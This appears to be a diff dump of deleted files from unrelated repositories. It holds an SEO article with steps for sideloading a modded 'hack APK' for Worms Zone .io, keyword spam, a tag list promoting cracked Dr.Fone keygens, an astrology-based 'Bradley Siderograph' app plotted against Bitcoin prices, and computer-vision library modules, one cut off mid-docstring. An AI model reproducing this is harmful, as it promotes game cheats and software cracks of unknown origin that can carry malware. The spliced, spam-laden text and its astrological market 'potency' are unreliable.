    15. Try to be the biggest worm on the map or the last worm alive.
    16. -
    -
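The grow-by-eating and crash rules from the steps above can be captured in a tiny toy model. This is only a sketch with made-up starting values, not the game's real logic:

```python
class Worm:
    def __init__(self):
        self.length = 3          # illustrative starting segment count
        self.alive = True

    def eat(self, food_value):
        # Eating food (or the remains of other worms) makes the worm longer
        if self.alive:
            self.length += food_value

    def crash(self):
        # Hitting another worm or the map border ends the run
        self.alive = False
```

A dead worm ignores further food, which mirrors how a run ends the moment you collide with something.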

    What is Worms Zone .io - Hungry Snake Hack APK?

    -

    Worms Zone .io - Hungry Snake Hack APK is a modified version of the original game that allows you to get unlimited money, skins, and power-ups for free. It is not an official app, but a third-party build that has been modified by unknown developers. By using this app, you can enjoy all the features and resources of the game without spending any money or watching any ads. You can also unlock all the items and modes in the game without completing any missions or achievements.

    -

    Benefits of Worms Zone .io - Hungry Snake Hack APK

    -
      -
    • Free and unlimited money: You can get as much money as you want in the game, which you can use to buy skins, outfits, and accessories for your worm.
    • -
    • Free and unlimited power-ups: You can get as many power-ups as you want in the game, which you can use to boost your speed, size, or vision.
    • -
    • Free and unlimited skins: You can get access to all the skins in the game, which you can use to customize your worm.
    • -
    • Free and unlimited modes and maps: You can get access to all the modes and maps in the game, which you can use to play in different scenarios and challenges.
    • -
    • No ads: You can play the game without any interruptions or distractions from ads.
    • -
    -

    Risks of Worms Zone .io - Hungry Snake Hack APK

    -
      -
    • Illegal and unsafe: The app is not authorized by the original developers of the game, and it may contain viruses or malware that can harm your device or steal your data.
    • -
    • Banned and blocked: The app may be detected by the game servers and you may be banned or blocked from playing the game online.
    • -
    • Unfair and unethical: The app may give you an unfair advantage over other players who are playing the game legitimately, and it may ruin the fun and balance of the game.
    • -
    -

    How to download and install Worms Zone .io - Hungry Snake Hack APK?

    -

    If you still want to try Worms Zone .io - Hungry Snake Hack APK, you need to follow these steps:

    -

    Step 1: Enable unknown sources

    -

    You need to enable unknown sources on your device to allow the installation of apps from outside the Google Play Store. To do this, go to Settings > Security > Unknown sources and toggle it on.

    -

    Step 2: Download the APK file

    -

    You need to download the APK file of Worms Zone .io - Hungry Snake Hack APK from a reliable source. You can search for it on Google or use this link. Make sure you scan the file for viruses before installing it.

    -

    Step 3: Install the APK file

    -

    You need to install the APK file on your device. To do this, locate the file in your downloads folder and tap on it. Follow the instructions on the screen to complete the installation.

    -

    Step 4: Launch the game and enjoy

    -

    You need to launch the game and enjoy all the features and resources for free. To do this, open the app icon on your home screen or app drawer. You may need to allow some permissions for the app to run properly.
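As an alternative to tapping the file in a file manager, an APK can also be sideloaded from a computer with the `adb` command-line tool. The sketch below only builds the argument list; it assumes `adb` is installed and USB debugging is enabled on the device, and you would pass the list to `subprocess.run` to actually execute it:

```python
def adb_install_command(apk_path, reinstall=True):
    # Build the argument list for `adb install`; the -r flag tells
    # adb to replace an already-installed app while keeping its data
    cmd = ["adb", "install"]
    if reinstall:
        cmd.append("-r")
    cmd.append(apk_path)
    return cmd
```

For example, `subprocess.run(adb_install_command("game.apk"))` would run `adb install -r game.apk`.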

    -

    worms zone io hungry snake mod apk unlimited money
    -worms zone io hungry snake cheat apk download
    -worms zone io hungry snake hack apk latest version
    -worms zone io hungry snake mod apk android 1
    -worms zone io hungry snake hack apk no root
    -worms zone io hungry snake cheat apk free
    -worms zone io hungry snake mod apk revdl
    -worms zone io hungry snake hack apk online
    -worms zone io hungry snake cheat apk 2023
    -worms zone io hungry snake mod apk rexdl
    -worms zone io hungry snake hack apk ios
    -worms zone io hungry snake cheat apk modded
    -worms zone io hungry snake mod apk happymod
    -worms zone io hungry snake hack apk offline
    -worms zone io hungry snake cheat apk unlimited coins
    -worms zone io hungry snake mod apk pure
    -worms zone io hungry snake hack apk 4.5.3
    -worms zone io hungry snake cheat apk for pc
    -worms zone io hungry snake mod apk vip
    -worms zone io hungry snake hack apk 4.5.2
    -worms zone io hungry snake cheat apk no ads
    -worms zone io hungry snake mod apk 4.5.4
    -worms zone io hungry snake hack apk for android
    -worms zone io hungry snake cheat apk unlocked
    -worms zone io hungry snake mod apk 4.5.5

    -

    Conclusion

    -

    Worms Zone .io - Hungry Snake is a fun and addictive snake game that you can play online with other players. However, if you want to get unlimited money, skins, and power-ups in the game, you can download and install Worms Zone .io - Hungry Snake Hack APK, a modified version of the original game that gives you access to all the features and resources for free. However, you should be aware of the risks involved in using this app, such as being illegal, unsafe, banned, blocked, unfair, and unethical. Therefore, we do not recommend using this app, and we advise you to play the game legitimately and responsibly.

    -

    FAQs

    -
      -
    • Q: Is Worms Zone .io - Hungry Snake Hack APK safe?
    • -
    • A: No, it is not safe. It may contain viruses or malware that can harm your device or steal your data. It may also be detected by the game servers and you may be banned or blocked from playing the game online.
    • -
    • Q: Is Worms Zone .io - Hungry Snake Hack APK legal?
    • -
    • A: No, it is not legal. It is not authorized by the original developers of the game, and it violates their terms of service and intellectual property rights.
    • -
    • Q: How can I get more coins in Worms Zone .io - Hungry Snake?
    • -
    • A: You can get more coins in the game by eating food and other worms, completing missions and achievements, watching ads, or buying them with real money.
    • -
    • Q: How can I change my worm skin and outfit in Worms Zone .io - Hungry Snake?
    • -
    • A: You can change your worm skin and outfit in the game by tapping on the hanger icon on the main menu. You can choose from hundreds of skins, outfits, and accessories that you have unlocked or bought with coins.
    • -
    • Q: How can I play with my friends in Worms Zone .io - Hungry Snake?
    • -
    • A: You can play with your friends in the game by tapping on the friends icon on the main menu. You can invite your friends to join your clan or join their clan. You can also chat with them, send emojis, and see their stats.
    • -
    • Q: What are the best power-ups in Worms Zone .io - Hungry Snake?
    • -
    • A: The best power-ups in the game are the magnet, which attracts food and coins to you; the shield, which protects you from crashing into other worms or the walls; and the lightning, which increases your speed and size.
    • -

    -
    -
    \ No newline at end of file diff --git a/spaces/contluForse/HuggingGPT/assets/Download Merry Christmas English Dubbed Torrent for Free A Guide to the Best Sources.md b/spaces/contluForse/HuggingGPT/assets/Download Merry Christmas English Dubbed Torrent for Free A Guide to the Best Sources.md deleted file mode 100644 index 0b290f8ca744a9ed63afce43eae8619c36cbb728..0000000000000000000000000000000000000000 --- a/spaces/contluForse/HuggingGPT/assets/Download Merry Christmas English Dubbed Torrent for Free A Guide to the Best Sources.md +++ /dev/null @@ -1,5 +0,0 @@ -
    -

    Posted in Data Recovery, Software. Tagged as dr fone 10.5.1 Crack, dr fone 10.7.2 Crack, dr fone 11 Crack, dr fone 11.0.7 Crack, dr fone 11.0.9 Crack mac, dr fone 11.3 crack, dr fone 11.4 Crack, dr fone 12.1 Crack, Dr Fone 12.2 Crack, dr fone 2022 Crack, dr fone 2023 crack, dr fone crack 2021, dr fone Crack 2022 Download, Dr.Fone iOS Crack, DR.Fone Keygen, Dr.Fone Mac Crack, DR.Fone Registration Code, wondershare dr fone crack ios, wondershare dr fone crack mac, wondershare dr fone torrent, wondershare dr.fone, wondershare dr.fone crack

    -

    Wondershare Dr.Fone for Android keygen


    Download Zip 🗸🗸🗸 https://ssurll.com/2uzvST



    -
    -
    \ No newline at end of file diff --git a/spaces/contluForse/HuggingGPT/assets/Eaten Alive 1980 Full Movie in Hindi Download The Most Shocking and Scary Scenes from the Film.md b/spaces/contluForse/HuggingGPT/assets/Eaten Alive 1980 Full Movie in Hindi Download The Most Shocking and Scary Scenes from the Film.md deleted file mode 100644 index d94a51690355202f36b01fd1a30581ce9f8c54bf..0000000000000000000000000000000000000000 --- a/spaces/contluForse/HuggingGPT/assets/Eaten Alive 1980 Full Movie in Hindi Download The Most Shocking and Scary Scenes from the Film.md +++ /dev/null @@ -1,6 +0,0 @@ -

    eatenalive1980fullmovieinhindidownload


    Download Zip ★★★ https://ssurll.com/2uzyhM



    - -
    -
    -
    -

    diff --git a/spaces/coolprakashjj/Bradley-Siderograph-Public/app.py b/spaces/coolprakashjj/Bradley-Siderograph-Public/app.py deleted file mode 100644 index 9fd4ee441e759d415405081fb6979c9a60f5351f..0000000000000000000000000000000000000000 --- a/spaces/coolprakashjj/Bradley-Siderograph-Public/app.py +++ /dev/null @@ -1,291 +0,0 @@ -import os -os.environ['SE_EPHE_PATH'] = 'ephe' - -import gradio as gr - -# !pip install --user pyswisseph - -import swisseph as swe -import datetime -from typing import Dict, List, Tuple, Callable, Optional -import numpy as np -import matplotlib.pyplot as plt -import pandas as pd -from itertools import combinations -from functools import reduce -import re - -def BradleySiderograph(start_date, end_date, center='geo', center_planet='EARTH', data_file='BTCUSD.csv'): - - # ---------------------------------------------------------------------------------------------------------------------------------------------------------------- - - def calculate_julian_day(date: datetime.date) -> float: - return swe.julday(date.year, date.month, date.day) - - def generate_dates(start_date: datetime.date, end_date: datetime.date) -> List[datetime.date]: - delta = end_date - start_date - return list(map(lambda i: start_date + datetime.timedelta(days=i), range(delta.days + 1))) - - def calculate_julian_days(start_date: datetime.date, end_date: datetime.date) -> Dict[datetime.date, float]: - date_range = generate_dates(start_date, end_date) - julian_days = dict(zip(date_range, map(calculate_julian_day, date_range))) - return julian_days - - start_date = datetime.datetime.strptime(start_date, '%Y-%m-%d').date() - end_date = datetime.datetime.strptime(end_date, '%Y-%m-%d').date() - - julian_days = calculate_julian_days(start_date, end_date) - - # ---------------------------------------------------------------------------------------------------------------------------------------------------------------- - data = pd.read_csv(data_file.name,parse_dates = 
True,index_col=0) - data = data.loc[start_date:end_date] - data = data.resample('D').mean().interpolate(method='linear', limit_direction='both') - data = np.log(data) -# ---------------------------------------------------------------------------------------------------------------------------------------------------------------- - if center == 'planeto': - if center_planet.upper() == 'MERCURY': - center_planet = swe.MERCURY - elif center_planet.upper() == 'VENUS': - center_planet = swe.VENUS - elif center_planet.upper() == 'EARTH': - center_planet = swe.EARTH - elif center_planet.upper() == 'MOON': - center_planet = swe.MOON - elif center_planet.upper() == 'MARS': - center_planet = swe.MARS - elif center_planet.upper() == 'JUPITER': - center_planet = swe.JUPITER - elif center_planet.upper() == 'SATURN': - center_planet = swe.SATURN - elif center_planet.upper() == 'URANUS': - center_planet = swe.URANUS - elif center_planet.upper() == 'NEPTUNE': - center_planet = swe.NEPTUNE - elif center_planet.upper() == 'PLUTO': - center_planet = swe.PLUTO - else: - raise ValueError("Invalid center_planet. 
Accepted values are 'MERCURY', 'VENUS', 'EARTH', 'MOON', 'MARS', 'JUPITER', 'SATURN', 'URANUS', 'NEPTUNE', or 'PLUTO'.") - - - mid_term_combinations = [ ('Mercury', 'Pluto'), ('Mercury', 'Neptune'), ('Mercury', 'Uranus'), ('Mercury', 'Saturn'), ('Mercury', 'Jupiter'), ('Mercury', 'Mars'), ('Mercury', 'Sun'), ('Mercury', 'Venus'), ('Venus', 'Pluto'), ('Venus', 'Neptune'), ('Venus', 'Uranus'), ('Venus', 'Saturn'), ('Venus', 'Jupiter'), ('Venus', 'Mars'), ('Sun', 'Pluto'), ('Sun', 'Neptune'), ('Sun', 'Uranus'), ('Sun', 'Saturn'), ('Sun', 'Jupiter'), ('Sun', 'Venus'), ('Mars', 'Pluto'), ('Mars', 'Neptune'), ('Mars', 'Uranus'), ('Mars', 'Saturn'), ('Mars', 'Sun'), ('Mars', 'Jupiter')] - long_term_combinations = [ ('Jupiter', 'Pluto'), ('Jupiter', 'Neptune'), ('Jupiter', 'Uranus'), ('Jupiter', 'Saturn'), ('Saturn', 'Pluto'), ('Saturn', 'Neptune'), ('Saturn', 'Uranus'), ('Uranus', 'Pluto'), ('Uranus', 'Neptune'), ('Neptune', 'Pluto'),] - - valency_data = [ - [ 1, 1, 1, 1, -1, 1, -1, -1, 1, -1], - [ 1, 1, 1, 1, -1, 1, -1, 1, -1, -1], - [ 1, 1, 1, 1, -1, 1, -1, 1, 1, -1], - [ 1, 1, 1, 1, -1, 1, -1, 1, 1, 1], - [-1, -1, -1, -1, 1, -1, -1, -1, -1, -1], - [ 1, 1, 1, 1, -1, 1, -1, -1, 1, -1], - [-1, -1, -1, -1, -1, -1, 1, -1, -1, -1], - [-1, 1, 1, 1, -1, -1, -1, 1, -1, -1], - [ 1, -1, 1, 1, -1, 1, -1, -1, 1, -1], - [-1, -1, -1, 1, -1, -1, -1, -1, -1, 1], - ] - - valency = pd.DataFrame(valency_data, index=[ "moon", "sun", "mercury", "venus", "mars", "jupiter", "saturn", "uranus", "neptune", "pluto"], columns=['moon', 'sun', 'mercury', 'venus', 'mars', 'jupiter', 'saturn', 'uranus', 'neptune', 'pluto']) - - planets = [swe.SUN, swe.MOON, swe.MERCURY, swe.VENUS, swe.MARS, swe.JUPITER, swe.SATURN, swe.URANUS, swe.NEPTUNE, swe.PLUTO] - - # ---------------------------------------------------------------------------------------------------------------------------------------------------------------- - def calculate_planetary_longitudes(julian_day: float, mode: str = 'geo') -> Dict[str, 
float]: - def get_longitude(planet: int) -> Dict[str, float]: - if mode == 'geo': - position, ret_code = swe.calc_ut(julian_day, planet, flags=swe.FLG_SWIEPH|swe.FLG_SIDEREAL) - elif mode == 'helio': - position, ret_code = swe.calc_ut(julian_day, planet, flags=swe.FLG_SWIEPH|swe.FLG_SIDEREAL|swe.FLG_HELCTR) - elif mode == 'planeto': - if planet != center_planet: - position, ret_code = swe.calc_pctr(julian_day, planet, center=center_planet, flags=swe.FLG_SWIEPH|swe.FLG_SIDEREAL) - else: - return {} # Return an empty dictionary if the planet and center are the same - else: - raise ValueError("Invalid mode. Accepted values are 'geo', 'helio', or 'planeto'.") - - return {swe.get_planet_name(planet) + "_Longitude": position[0]} - - longitudes = {k: v for d in map(get_longitude, planets) for k, v in d.items()} - - return longitudes - - def calculate_all_longitudes(julian_days: Dict[datetime.date, float], mode: str = 'geo') -> Dict[datetime.date, Dict[str, float]]: - return dict(map(lambda date_jd: (date_jd[0], calculate_planetary_longitudes(date_jd[1], mode)), julian_days.items())) - - # Calculate the geo longitudes for all planets for each day - planetary_longitudes = calculate_all_longitudes(julian_days, mode=center) - - # Convert to DataFrame format - df_planetary_longitudes = pd.DataFrame.from_dict(planetary_longitudes, orient='index') - df_planetary_longitudes.index.name = 'timestamp' - df_planetary_longitudes.reset_index(inplace=True) - df_planetary_longitudes.set_index('timestamp', inplace=True) - - # ---------------------------------------------------------------------------------------------------------------------------------------------------------------- - def calculate_planetary_declinations(julian_day: float, mode: str = 'geo') -> Dict[str, float]: - planets = [swe.VENUS, swe.MARS] - - def get_declination(planet: int) -> Tuple[str, float]: - if mode == 'geo': - position, ret_code = swe.calc_ut(julian_day, planet, 
flags=swe.FLG_SWIEPH|swe.FLG_EQUATORIAL|swe.FLG_SIDEREAL) - elif mode == 'helio': - position, ret_code = swe.calc_ut(julian_day, planet, flags=swe.FLG_SWIEPH|swe.FLG_EQUATORIAL|swe.FLG_SIDEREAL|swe.FLG_HELCTR) - elif mode == 'planeto': - if planet != center_planet: - position, ret_code = swe.calc_pctr(julian_day, planet, center=center_planet, flags=swe.FLG_SWIEPH|swe.FLG_EQUATORIAL|swe.FLG_SIDEREAL) - # print(position) - else: - return {} # Return an empty dictionary if the planet and center are the same - else: - raise ValueError("Invalid mode. Accepted values are 'geo', 'helio', or 'planeto'.") - - return {swe.get_planet_name(planet) + "_Declination": position[1]} - - declinations = {k: v for d in map(get_declination, planets) for k, v in d.items()} - - return declinations - - def calculate_all_declinations(julian_days: Dict[datetime.date, float], mode: str = 'geo') -> Dict[datetime.date, Dict[str, float]]: - return dict(map(lambda date_jd: (date_jd[0], calculate_planetary_declinations(date_jd[1], mode)), julian_days.items())) - - # Calculate the geo declinations for all planets for each day - planetary_declinations = calculate_all_declinations(julian_days, mode=center) - - # Convert to DataFrame format - df_planetary_declinations = pd.DataFrame.from_dict(planetary_declinations, orient='index') - df_planetary_declinations.index.name = 'timestamp' - df_planetary_declinations.reset_index(inplace=True) - df_planetary_declinations.set_index('timestamp', inplace=True) - # ---------------------------------------------------------------------------------------------------------------------------------------------------------------- - def create_aspect(aspect: int, planetary_longitudes: pd.DataFrame, valency: pd.DataFrame) -> pd.DataFrame: - def calc_amplitude(delta_longitude: float, planet1: str, planet2: str) -> float: - delta = np.abs(delta_longitude - aspect) - if delta <= 15: - amplitude = 10 - delta - if aspect == 0: - amplitude *= valency.at[planet1.lower(), 
planet2.lower()] - else: - amplitude = 0 - return amplitude - - planet_combinations = list(combinations(planetary_longitudes.columns, 2)) - - aspect_data = [pd.DataFrame({ - f"{pair[0].split('_')[0]}_{pair[1].split('_')[0]}_{aspect}": - np.abs(planetary_longitudes[pair[0]] - planetary_longitudes[pair[1]]).apply( - calc_amplitude, args=(pair[0].split('_')[0], pair[1].split('_')[0]))}) - for pair in planet_combinations] - - return pd.concat(aspect_data, axis=1) - - # Calculate aspects for each aspect angle (0, 60, 90, 120, and 180 degrees) - aspects = [0, 60, 90, 120, 180] - df_aspects = [create_aspect(aspect, df_planetary_longitudes, valency) for aspect in aspects] - - # Combine all aspect DataFrames - df_all_aspects = pd.concat(df_aspects, axis=1) - - - # ---------------------------------------------------------------------------------------------------------------------------------------------------------------- - def calculate_influence_vectorized(df_all_aspects: pd.DataFrame, combinations: List[Tuple[str, str]]) -> pd.Series: - def get_matching_columns(combo: Tuple[str, str]) -> pd.Index: - pattern = re.compile(f"{combo[0]}_{combo[1]}_\\d+") # pattern to match any aspect involving the planets in the current combination - matching_cols = df_all_aspects.columns[df_all_aspects.columns.str.match(pattern)] - return matching_cols - - def add_influence(acc: pd.Series, matching_cols: pd.Index) -> pd.Series: - return acc.add(df_all_aspects.loc[:, matching_cols].sum(axis=1), fill_value=0) - - matching_columns = map(get_matching_columns, combinations) - influence_values = reduce(add_influence, matching_columns, pd.Series(index=df_all_aspects.index, dtype=float).fillna(0)) - - return influence_values - - # ---------------------------------------------------------------------------------------------------------------------------------------------------------------- - def calculate_p(df_all_aspects: pd.DataFrame, mid_term_combinations: List[Tuple[str, str]], 
long_term_combinations: List[Tuple[str, str]], planetary_declinations: pd.DataFrame) -> np.ndarray: - # Calculate M - M = calculate_influence_vectorized(df_all_aspects, mid_term_combinations) - - # Calculate L - L = calculate_influence_vectorized(df_all_aspects, long_term_combinations) - - # Calculate D - D = planetary_declinations.sum(axis=1) - - # Calculate X - X = 4 - - # Calculate P - P = M.add((L.add(D)).multiply(X)) - - return P - - # ---------------------------------------------------------------------------------------------------------------------------------------------------------------- - - P = calculate_p(df_all_aspects, mid_term_combinations, long_term_combinations, df_planetary_declinations) - - # ---------------------------------------------------------------------------------------------------------------------------------------------------------------- - - fig, ax1 = plt.subplots(figsize=(20,10), sharex=True) - ax2 = ax1.twinx() - - ax1.plot(P, linewidth=2, color="black", label="Potency") - ax1.set_ylabel('Potency', color='black') - - ax2.plot(data.iloc[:, 0], linewidth=2, color="red", label="Y") - ax2.set_ylabel('Y', color='red') - - # Create a custom formatter to display the original values on the y-axis labels - def tick_formatter(val, pos): - return '{:.0f}'.format(np.exp(val)) - - # Set the custom formatter as the y-axis tick formatter for ax2 - ax2.yaxis.set_major_formatter(plt.FuncFormatter(tick_formatter)) - - # Set a title for the entire figure - title = 'Bradley Siderograph' - fig.suptitle(title, fontsize=20, fontweight="bold") - - # Set a grid on all three axes - grid_style = {'linewidth': 0.5, 'color': 'gray', 'linestyle': '--'} - ax1.grid(True, **grid_style) - ax2.grid(True, **grid_style) - - # Add a legend for all three axes - lines, labels = ax1.get_legend_handles_labels() - lines2, labels2 = ax2.get_legend_handles_labels() - - lines += lines2 - labels += labels2 - - fig.legend(lines, labels, loc='upper right') - - - - - plot_path = 
"bradley_siderograph.png" - plt.savefig(plot_path) - plt.close() - return plot_path - # ---------------------------------------------------------------------------------------------------------------------------------------------------------------- - -input_data = [ - gr.Textbox(value='2023-01-01', placeholder='2023-01-01'), - gr.Textbox(value='2024-01-01', placeholder='2024-01-01'), - gr.Radio(['geo', 'helio', 'planeto']), - gr.Radio(['MERCURY', 'VENUS', 'EARTH', 'MOON', 'MARS', 'JUPITER', 'SATURN', 'URANUS', 'NEPTUNE', 'PLUTO']), - gr.File(label="Upload CSV file"), -] - - -iface = gr.Interface( - fn=BradleySiderograph, - inputs=input_data, - outputs="image", - examples=[ - ["2023-01-01", "2023-12-31", "geo", "EARTH", "BTCUSD.csv"], - ["2023-01-01", "2023-12-31", "planeto", "VENUS", "BTCUSD.csv",], - ], - live=True -) - -iface.launch() diff --git a/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/mmpkg/mmcv/cnn/utils/fuse_conv_bn.py b/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/mmpkg/mmcv/cnn/utils/fuse_conv_bn.py deleted file mode 100644 index cb7076f80bf37f7931185bf0293ffcc1ce19c8ef..0000000000000000000000000000000000000000 --- a/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/mmpkg/mmcv/cnn/utils/fuse_conv_bn.py +++ /dev/null @@ -1,59 +0,0 @@ -# Copyright (c) OpenMMLab. All rights reserved. -import torch -import torch.nn as nn - - -def _fuse_conv_bn(conv, bn): - """Fuse conv and bn into one module. - - Args: - conv (nn.Module): Conv to be fused. - bn (nn.Module): BN to be fused. - - Returns: - nn.Module: Fused module. 
- """ - conv_w = conv.weight - conv_b = conv.bias if conv.bias is not None else torch.zeros_like( - bn.running_mean) - - factor = bn.weight / torch.sqrt(bn.running_var + bn.eps) - conv.weight = nn.Parameter(conv_w * - factor.reshape([conv.out_channels, 1, 1, 1])) - conv.bias = nn.Parameter((conv_b - bn.running_mean) * factor + bn.bias) - return conv - - -def fuse_conv_bn(module): - """Recursively fuse conv and bn in a module. - - During inference, the functionary of batch norm layers is turned off - but only the mean and var alone channels are used, which exposes the - chance to fuse it with the preceding conv layers to save computations and - simplify network structures. - - Args: - module (nn.Module): Module to be fused. - - Returns: - nn.Module: Fused module. - """ - last_conv = None - last_conv_name = None - - for name, child in module.named_children(): - if isinstance(child, - (nn.modules.batchnorm._BatchNorm, nn.SyncBatchNorm)): - if last_conv is None: # only fuse BN that is after Conv - continue - fused_conv = _fuse_conv_bn(last_conv, child) - module._modules[last_conv_name] = fused_conv - # To reduce changes, set BN as Identity instead of deleting it. 
- module._modules[name] = nn.Identity() - last_conv = None - elif isinstance(child, nn.Conv2d): - last_conv = child - last_conv_name = name - else: - fuse_conv_bn(child) - return module diff --git a/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/mmpkg/mmseg/models/decode_heads/dm_head.py b/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/mmpkg/mmseg/models/decode_heads/dm_head.py deleted file mode 100644 index de6d0f6390d96c1eef4242cdc9aed91ec7714c6a..0000000000000000000000000000000000000000 --- a/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/mmpkg/mmseg/models/decode_heads/dm_head.py +++ /dev/null @@ -1,140 +0,0 @@ -import torch -import torch.nn as nn -import torch.nn.functional as F -from annotator.mmpkg.mmcv.cnn import ConvModule, build_activation_layer, build_norm_layer - -from ..builder import HEADS -from .decode_head import BaseDecodeHead - - -class DCM(nn.Module): - """Dynamic Convolutional Module used in DMNet. - - Args: - filter_size (int): The filter size of generated convolution kernel - used in Dynamic Convolutional Module. - fusion (bool): Add one conv to fuse DCM output feature. - in_channels (int): Input channels. - channels (int): Channels after modules, before conv_seg. - conv_cfg (dict | None): Config of conv layers. - norm_cfg (dict | None): Config of norm layers. - act_cfg (dict): Config of activation layers. 
- """ - - def __init__(self, filter_size, fusion, in_channels, channels, conv_cfg, - norm_cfg, act_cfg): - super(DCM, self).__init__() - self.filter_size = filter_size - self.fusion = fusion - self.in_channels = in_channels - self.channels = channels - self.conv_cfg = conv_cfg - self.norm_cfg = norm_cfg - self.act_cfg = act_cfg - self.filter_gen_conv = nn.Conv2d(self.in_channels, self.channels, 1, 1, - 0) - - self.input_redu_conv = ConvModule( - self.in_channels, - self.channels, - 1, - conv_cfg=self.conv_cfg, - norm_cfg=self.norm_cfg, - act_cfg=self.act_cfg) - - if self.norm_cfg is not None: - self.norm = build_norm_layer(self.norm_cfg, self.channels)[1] - else: - self.norm = None - self.activate = build_activation_layer(self.act_cfg) - - if self.fusion: - self.fusion_conv = ConvModule( - self.channels, - self.channels, - 1, - conv_cfg=self.conv_cfg, - norm_cfg=self.norm_cfg, - act_cfg=self.act_cfg) - - def forward(self, x): - """Forward function.""" - generated_filter = self.filter_gen_conv( - F.adaptive_avg_pool2d(x, self.filter_size)) - x = self.input_redu_conv(x) - b, c, h, w = x.shape - # [1, b * c, h, w], c = self.channels - x = x.view(1, b * c, h, w) - # [b * c, 1, filter_size, filter_size] - generated_filter = generated_filter.view(b * c, 1, self.filter_size, - self.filter_size) - pad = (self.filter_size - 1) // 2 - if (self.filter_size - 1) % 2 == 0: - p2d = (pad, pad, pad, pad) - else: - p2d = (pad + 1, pad, pad + 1, pad) - x = F.pad(input=x, pad=p2d, mode='constant', value=0) - # [1, b * c, h, w] - output = F.conv2d(input=x, weight=generated_filter, groups=b * c) - # [b, c, h, w] - output = output.view(b, c, h, w) - if self.norm is not None: - output = self.norm(output) - output = self.activate(output) - - if self.fusion: - output = self.fusion_conv(output) - - return output - - -@HEADS.register_module() -class DMHead(BaseDecodeHead): - """Dynamic Multi-scale Filters for Semantic Segmentation. - - This head is the implementation of - `DMNet `_. 
- - Args: - filter_sizes (tuple[int]): The size of generated convolutional filters - used in Dynamic Convolutional Module. Default: (1, 3, 5, 7). - fusion (bool): Add one conv to fuse DCM output feature. - """ - - def __init__(self, filter_sizes=(1, 3, 5, 7), fusion=False, **kwargs): - super(DMHead, self).__init__(**kwargs) - assert isinstance(filter_sizes, (list, tuple)) - self.filter_sizes = filter_sizes - self.fusion = fusion - dcm_modules = [] - for filter_size in self.filter_sizes: - dcm_modules.append( - DCM(filter_size, - self.fusion, - self.in_channels, - self.channels, - conv_cfg=self.conv_cfg, - norm_cfg=self.norm_cfg, - act_cfg=self.act_cfg)) - self.dcm_modules = nn.ModuleList(dcm_modules) - self.bottleneck = ConvModule( - self.in_channels + len(filter_sizes) * self.channels, - self.channels, - 3, - padding=1, - conv_cfg=self.conv_cfg, - norm_cfg=self.norm_cfg, - act_cfg=self.act_cfg) - - def forward(self, inputs): - """Forward function.""" - x = self._transform_inputs(inputs) - dcm_outs = [x] - for dcm_module in self.dcm_modules: - dcm_outs.append(dcm_module(x)) - dcm_outs = torch.cat(dcm_outs, dim=1) - output = self.bottleneck(dcm_outs) - output = self.cls_seg(output) - return output diff --git a/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/oneformer/detectron2/modeling/proposal_generator/__init__.py b/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/oneformer/detectron2/modeling/proposal_generator/__init__.py deleted file mode 100644 index 3f4e4df7645c67b7a013295207b98fe70b2e574c..0000000000000000000000000000000000000000 --- a/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/oneformer/detectron2/modeling/proposal_generator/__init__.py +++ /dev/null @@ -1,5 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. 
-from .build import PROPOSAL_GENERATOR_REGISTRY, build_proposal_generator -from .rpn import RPN_HEAD_REGISTRY, build_rpn_head, RPN, StandardRPNHead - -__all__ = list(globals().keys()) diff --git a/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/uniformer/mmcv/ops/contour_expand.py b/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/uniformer/mmcv/ops/contour_expand.py deleted file mode 100644 index ea1111e1768b5f27e118bf7dbc0d9c70a7afd6d7..0000000000000000000000000000000000000000 --- a/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/uniformer/mmcv/ops/contour_expand.py +++ /dev/null @@ -1,49 +0,0 @@ -# Copyright (c) OpenMMLab. All rights reserved. -import numpy as np -import torch - -from ..utils import ext_loader - -ext_module = ext_loader.load_ext('_ext', ['contour_expand']) - - -def contour_expand(kernel_mask, internal_kernel_label, min_kernel_area, - kernel_num): - """Expand kernel contours so that foreground pixels are assigned into - instances. - - Arguments: - kernel_mask (np.array or Tensor): The instance kernel mask with - size hxw. - internal_kernel_label (np.array or Tensor): The instance internal - kernel label with size hxw. - min_kernel_area (int): The minimum kernel area. - kernel_num (int): The instance kernel number. - - Returns: - label (list): The instance index map with size hxw. 
- """ - assert isinstance(kernel_mask, (torch.Tensor, np.ndarray)) - assert isinstance(internal_kernel_label, (torch.Tensor, np.ndarray)) - assert isinstance(min_kernel_area, int) - assert isinstance(kernel_num, int) - - if isinstance(kernel_mask, np.ndarray): - kernel_mask = torch.from_numpy(kernel_mask) - if isinstance(internal_kernel_label, np.ndarray): - internal_kernel_label = torch.from_numpy(internal_kernel_label) - - if torch.__version__ == 'parrots': - if kernel_mask.shape[0] == 0 or internal_kernel_label.shape[0] == 0: - label = [] - else: - label = ext_module.contour_expand( - kernel_mask, - internal_kernel_label, - min_kernel_area=min_kernel_area, - kernel_num=kernel_num) - label = label.tolist() - else: - label = ext_module.contour_expand(kernel_mask, internal_kernel_label, - min_kernel_area, kernel_num) - return label diff --git a/spaces/cscan/CodeFormer/CodeFormer/basicsr/metrics/psnr_ssim.py b/spaces/cscan/CodeFormer/CodeFormer/basicsr/metrics/psnr_ssim.py deleted file mode 100644 index bbd950699c2495880236883861d9e199f900eae8..0000000000000000000000000000000000000000 --- a/spaces/cscan/CodeFormer/CodeFormer/basicsr/metrics/psnr_ssim.py +++ /dev/null @@ -1,128 +0,0 @@ -import cv2 -import numpy as np - -from basicsr.metrics.metric_util import reorder_image, to_y_channel -from basicsr.utils.registry import METRIC_REGISTRY - - -@METRIC_REGISTRY.register() -def calculate_psnr(img1, img2, crop_border, input_order='HWC', test_y_channel=False): - """Calculate PSNR (Peak Signal-to-Noise Ratio). - - Ref: https://en.wikipedia.org/wiki/Peak_signal-to-noise_ratio - - Args: - img1 (ndarray): Images with range [0, 255]. - img2 (ndarray): Images with range 